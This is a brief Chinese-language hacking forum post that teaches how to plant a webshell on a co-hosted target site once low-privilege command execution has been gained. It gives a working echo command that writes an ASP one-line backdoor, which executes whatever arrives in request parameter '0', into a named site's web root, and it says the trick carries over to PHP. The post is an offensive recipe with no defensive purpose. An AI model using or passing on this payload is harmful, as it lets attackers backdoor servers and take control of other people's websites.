admin 发表于 2012-9-23 14:40:24

旁注cmd低权限下拿webshell

在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。

命令格式

Echo 语句 >目标站绝对目录

例如:

echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp

这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
页: [1]
查看完整版本: 旁注cmd低权限下拿webshell